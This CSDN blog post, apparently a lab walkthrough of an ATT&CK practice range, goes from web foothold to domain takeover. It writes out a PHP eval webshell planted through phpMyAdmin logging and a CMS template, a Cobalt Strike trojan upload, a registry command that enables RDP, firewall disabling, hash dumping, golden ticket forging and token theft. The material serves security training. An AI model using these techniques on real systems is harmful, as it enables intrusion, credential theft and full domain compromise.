ATT&CK实战系列-从web打点到内网渗透

最新推荐文章于 2023-07-09 11:49:43 发布
最新推荐文章于 2023-07-09 11:49:43 发布
阅读量1.7k 收藏 7
点赞数
分类专栏: 外网到内网综合利用 文章标签: 安全 服务器 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53884648/article/details/127282548
版权

学习目标:

  • 搭建需求环境(windows7提供web服务双网卡可访问外网和内网主机;window2008 内网域控 ;windows7 内网主机)

学习内容:

例如:

  1. 环境搭建。
  2. web打点
  3. shell连接(使用蚁剑)
  4. 内网渗透

一、环境搭建

攻击机:kali

靶机:

1.web服务:window 7(vm1)

2.windows 2008(域控)

3.windows 7(内网主机)

下载位置:链接:https://pan.baidu.com/s/1b3bC2prsUf5NDy8RzpVoqw 
提取码:6785 

注意:靶场环境下载30天

window 7 web服务网卡设置 (NAT可以上网,通过kali进行打击)

windows 2008(域控)

windows 7加入域控

找到ipv4属性进行下面的指定IP的设置;注意网关和DNS和域控地址一致。

之后点击计算机属性--->点击更改设置---->点击更改----->加入域输入域名

 

 

 

 注意这里内网的三台主机都在同一网段(192.168.52.0)

由于windows2003下载出现问题,我这里使用另一台windows7 加入windows2008域控即可。

之后我们进行内网的相互ping通保证内网相同即可。(如果ping不通的话关闭所有主机的防火墙再次尝试。)

二、web打点

windows 7使用phpstudy搭建的网站现打开站点

1.进行nmap扫描

命令:namp -sV -p 1-65000 192.168.91.143

2.查看网站信息。

3.使用Dirbustr进行目录扫描。

4.访问phpadmin目录进入管理后台,使用默认账户root/root进行登录

5.尝试通过执行sql语句写入shell。

命令:select '<?php phpinfo();?>' into outfile 'C:/phpStudy/WWW/phpinfo.php'

发现出错。

6.尝试通过日志写入shell

命令:show variables like '%general%'

看到日志功能是关闭的,我们尝试命令:set  global  general_log=on

再次查看日志功能是否开启

我们修改一下保存路径,放边待会写入shell时使用shell工具连接。

命令:set global general_log_file='C:/phpstudy/WWW/shell.php'

查看内容 show variables like '%general%'

写入一句话木马,通过查询方式

命令:select '<?php eval($_POST[("passwd")]);?>'

 

用中国蚁剑进行连接。

 

7.我们已经成功写入webshell,前面我们通过目录扫描到很多地址信息,找到/yxcms/是一个备份文件,我们点击登录:

从登录页面我们看到了后台登录位置和账户密码

后台地址;/index.php?r=admin

账户密码:admin /123456

8.我们通过模板写入webshell

之后我们要尝试使用蚁剑连接,我们观察到这个文件位置是查询到的。

 

我们拿到地址:admin/set/tpedit&Mname=default&fname=index_search.php

不行我们随便执行查询更改为

?r=default%2Findex%2Fsearch&keywords=777&type=all

使用蚁剑连接,就可以拿到后台了。 

三、后门上传连接

1.讲个上线CS,上篇文章使用msf上传的,这次结合蚁剑上传CS生成的exe文件进行后期管理。

CS使用

在服务端输入命令 ./teamserver 服务端IP 密码

客户端点击sh文件

2.使用cs生成exe木马文件

创建监听器ip端口为本地IP

生成exe木马

通过蚁剑进行上传木马。

通过shell找到exe文件位置点击执行,CS成功上线。

四、内网渗透

1.信息收集

net time /domain #查看时间服务器,判断主域,主域服务器都做时间服务器
net user /domain #查看域用户
net view /domain #查看有几个域
ipconfig /all       #查询本机IP段,所在域等
net config Workstation #当前计算机名,全名,用户名,系统版本,工作站域,登陆域
net user         #本机用户列表
net group "domain computers" /domain #查看域内所有的主机名
net group "domain admins" /domain #查看域管理员
net group "domain controllers" /domain #查看域控
net localhroup administrators #本机管理员[通常含有域用户]
net user 用户名 /domain #获取指定用户的账户信息
net group /domain #查询域里面的工作组
net group 组名 /domain #查询域中的某工作组
net time /domain #查看时间服务器,判断主域,主域服务器都做时间服务器 net user /domain #查看域用户 net view /domain #查看有几个域 ipconfig /all       #查询本机IP段,所在域等 net config Workstation #当前计算机名,全名,用户名,系统版本,工作站域,登陆域 net user         #本机用户列表 net group "domain computers" /domain #查看域内所有的主机名 net group "domain admins" /domain #查看域管理员 net group "domain controllers" /domain #查看域控 net localhroup administrators #本机管理员[通常含有域用户] net user 用户名 /domain #获取指定用户的账户信息 net group /domain #查询域里面的工作组 net group 组名 /domain #查询域中的某工作组
ipconfig /all看到有内网ip #可判断是否存在域

一些命令在msf的shell没能成功执行,但在cs下可以

权限信息

通过提权工具直接提权为system

看到域内成员

通过命令:shell  ipconfig /all

 

命令:shell  arp -a

知道内网环境为三台主机

主机1:STU1  IP1:192.168.91.143   ip2:192.168.52.143

主机2:mayong-pc$   ip:192.168.52.141

主机3 ROOT-TVI862UBEH$(域控通过DNS2服务器可知)IP:192.168.52.138

2.进行横向探测

命令:

shell  net  view 

 

尝试远程登录;因为3389端口没有开放 

命令:reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

 

使用命令:advfirewall set allprofiles state off 增加防火墙策略

添加用户

 3.由于内网不出网我们登录3389

 

4.进行横向渗透

使用CS进行内网端口扫描

扫描结果----内网三台主机端口开发情况

 net view 一下,看内网其他主机可不可以看到(不可以的话要添加路由)

转存hash之后---查看登录密码(等待对方登录就可以看到明文)

 

5.派生smb beacon

因为192.168.52.0/24段不能直接连接到攻击机 地址,所以需要CS派生smb beacon。让内网的主机连接到win7上。

SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。

简单来说,SMB Beacon 有两种方式

「第一种直接派生一个孩子,目的为了进一步盗取内网主机的 hash」

点击对应的shell主机---》增加会话---选择刚刚的listener

「第二种在已有的 beacon 上创建监听,用来作为跳板进行内网穿透」前提是能够通过 shell 之类访问到内网其他主机

6.psexec 使用凭证登录其他主机

前面横向探测已经获取到内网内的其他 Targets 以及读取到的凭证信息 于是可以尝试使用 psexec 模块登录其他主机 右键选择  域控主机 owa  的 psexec 模块:

 

 

 

进入域控主机beacon

7.制造黄金票据

7.1制作黄金票据的前提条件

  1. 域名称

  2. 域的 SID

  3. 域的 krbtgt账户的密码 hash 值 (NTLM or aes256_hmac)

  4. 伪造的用户名,可以是任意用户甚至是不存在

krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户

7.2构造黄金票据

域名已经在前面收集到:god.org

拿到域控主机后,就可以伪造黄金票据了,先选择hashdump得到kebtgt账户的NTLM值:

 

 

然后使用mimikatz找到一个合法的sid

然后就可以构造黄金票据了,用户名任意,域名为当前域名,sid和hash值就是刚才获取到的:

 

 

可以使用mimikatz kerberos::list命令查看当前系统的票据:

8.上线那台域用户:MAYONG-PC

加载票据访问,选择监听器后执行,主机成功上线:

 

9.窃取token

直接窃取 GOD\Administrator 的 token 来登录其他主机 选择 beacon 右键 -> 目标 -> 进程列表 选择 GOD\Administrator 的 token 盗取:

 

然后在选择令牌处勾选使用当前 token 即可:

 

 

 

 

 

 

 

 

 

添衣&吹風
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
web渗透、内网渗透,6个月以来的学习感受
Nginx521的博客
12-30 1903
网安自学之路、web渗透、内网渗透、免杀、隧道技术
web外网打点常规渗透思路
qq_38675102的博客
12-31 1001
web外网打点思路整理
打点-进入内网(二)
qq_44555676的博客
08-28 365
未授权访问漏洞前言一、Redis1.Ubuntu中搭建Redis服务器安装检查Redis服务器系统进程通过启动命令检查Redis服务器状态通过命令行客户端访问Redis修改Redis的配置2.Kall下redis-cli的安装3.写入文件4.反弹shell - Linux5.写入公钥6.清空数据库 前言 这类问题覆盖的应用、利用方式较广,因此只举例频次较高的漏洞。 一、Redis Redis是一个开源的使用ANSI C语言编写、支持网绍、可基于内存亦可持久化的日志型、Key-Value数据库。 1.U
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记
ierciyuan的博客
08-01 1万+
内网渗透实战攻打红日靶场第一关,包括环境配置、信息收集、漏洞利用、内网信息收集、内网攻击、横向移动等操作。
打点-进入内网(一)
qq_44555676的博客
08-24 668
应用系统漏洞利用常见漏洞扫描1.Nmap扫描技巧2.impacket框架之mssql服务器安全检测mssglclient与其他工具相比的优势Mssqlclient的基本使用命令为Impacket网络协议工具包安装举例分析几种实际使用情况3.读入数据 常见漏洞扫描 1.Nmap扫描技巧 auth 处理身份验证 broadcast 网络广播 brute 暴力猜解 default 默认 discovery 服务发现 dos 拒绝服务 exploit 漏洞利用 external 外部扩展 fuzzer 模糊测
网络安全之信息收集/打点技术
北冥同学的成长记录笔记
07-09 1165
《孙子兵法》中写道:知己知彼,百战不殆。信息收集是网络攻击或是渗透测试中的第一步,也是最关键的阶段,同时也是耗费时间最长的阶段。换句话说:渗透测试/网络攻击的本质就是信息收集。
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御...movement(横向渗透) 九、C&C(命令控制) 十、Exfiltration(信息窃取
ATT&CK手册(修改版)
09-16
**ATT&CK手册(修改版)** ATT&CK(Adversarial Tactics, Techniques & Common Knowledge)是由美国非营利组织MITRE Corporation开发的一种框架,用于描述和分类网络攻击者的行为战术、技术和过程(TTPs)。这个框架...
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
05-27
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
如何建立企业内部的ATT&CK.pdf
09-13
**ATT&CK框架详解** MITRE的ATT&CK(Adversarial Tactics, Techniques, and Common Knowledge)框架是一种广泛采用的安全模型,它详细描述了攻击者在不同阶段可能使用的战术、技术和程序(TTPs)。该框架帮助企业...
att ck 中文_MITRE | ATT&CK 中文站 [ 欢迎~ ]
weixin_33474071的博客
01-30 2045
所谓MITRE ATT&CK 暂且可以把它简单的理解成实战[ 偏 APT方向 ]攻防对抗 "矩阵"[ 或者叫知识库更贴切些 ],上面会不定时更新一些最新的关于APT方向的攻击利用技术[当然啦,网站本身远不止这些东西 ],可能也是由于各种各样的原因吧,上面针对各个技术点的介绍显得非常粗略 [ 不过话说回来,粗糙时粗糙了点,但却无意中确实也提供了很多的很好的可以继续深度利用...
红日安全ATTCK靶机实战系列之vulnstack1
黑白的博客
04-13 6872
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 边下载着,可以开始vmware的网络配置 下图为官方给出的,从虚拟机网络来看 攻击者:kali+windows的攻击机 VM1:对外边界服务器,win7 VM2:域成员,2003 VM3:域控,2008 所以这中间出现两个网段,一个外网网段,一个内网网段 鉴于需要两个网段,我们需要在vmware上做一些配置 首先,用一
打点系统优化HTTP请求
劫无忧
03-15 3789
为更好的理解用户,互联网公司会将用户的行为收集上来进行分析,打点系统应运而生。但互联网公司的用户数都比较多,而且每个用户的行为也很多,这样服务器收到的打点请求就非常多,QPS非常高,对web服务器的要求也会非常之高。为提升整个打点系统的性能,可以采用以下几个方式。 减少打点的次数 常规的方案是将多个行为事件合并后上传,以减少单个客户端的上报次数,这会导致一个事件触发后,事件没有及时上传,从...
记首次HW|某地级市攻防演练红队渗透总结
include_voidmain的博客
05-11 652
声明 以下内容,来自先知社区walker1995作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。 0x01 前言 上周参加了某地级市为期七天的网络攻防演练对抗赛,总共14支攻击队。大概情况是:第一天多为弱口令和应用层漏洞攻击且有攻击队申请高危漏洞攻击,之后想必都开始了高危漏洞利用,内网攻击,第四天就有攻击队开始使用0 day,Nday,社工钓鱼攻击,从第五天凌晨起进入混打乱斗模式,所有目标都变为公共目标,第七天18点
Web 页面性能打点术语解释
Luckyzhoufangbing的博客
11-11 628
术语解释 1. 打点字段:全流程关键步骤的埋点的名称 2.SDK:数据采集和数据上报的工具集(如 Slardar / Google Analytics) 3.业务方:具体进行数据采集和数据上报的业务开发者 4.SPA:Single Page Application,单页面应用 5.SPA 页面切换:SPA 页面的客户端路由切换页面 6.同步跳转:服务端路由切换页面 7.报表字段:数据处理和报表消费的指标名称 报表字段 描述 数据...
ATT&CK实战系列二(CS域渗透)
weixin_44155363的博客
08-01 2354
环境配置: DC IP:10.10.10.10 OS:Windows 2012 应用:AD域 WEB(恢复快照后在登录) IP1:10.10.10.80 IP2:192.168.167.133 OS:Windows 2008 应用:Weblogic 10.3.6 MSSQL 2008 PC IP1:10.10.10.201 IP2:192.168.167.129 OS:Windows 7 攻击机 IP:192.168.167.128 OS:Windows 10 IP:192.168.167.131 OS:K
webshell开始的内网入侵
zhalang8324的博客
08-10 3109
一个关于内网入侵的小总结
内网渗透 | 手把手教你如何进行内网渗透
热门推荐
songbai220
11-23 1万+
内网渗透 | 手把手教你如何进行内网渗透 目录 内网渗透 | 手把手教你如何进行内网渗透 0x01 DMZ渗透 0x02 跳板及内网探测 0x2.1 做跳板 0x2.2 内网探测 0x03 第二层渗透 0x3.1 web渗透 or MS17_010 0x3.2 内网探测+跳板代理链 0x4 第三层内网渗透 0x5 总结 0x5.1 跳板总结 0x5.2 内网探测 0x5.3 后话 0x01 DMZ渗透 首页 看到DMZ开启了web服务,是一个typec...
Introdução ao Mitre Att_ck e ao Cyber Kill Chain.pdf
最新发布
10-06
本资源是一份关于网络安全渗透测试的教程,主要聚焦于Mitre ATT&CK框架和Cyber Kill Chain的概念,旨在帮助学习者理解和应用在实际安全操作中。课程的目标是区分Red Team(攻击方)和Pen Test(渗透测试)之间的角色...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值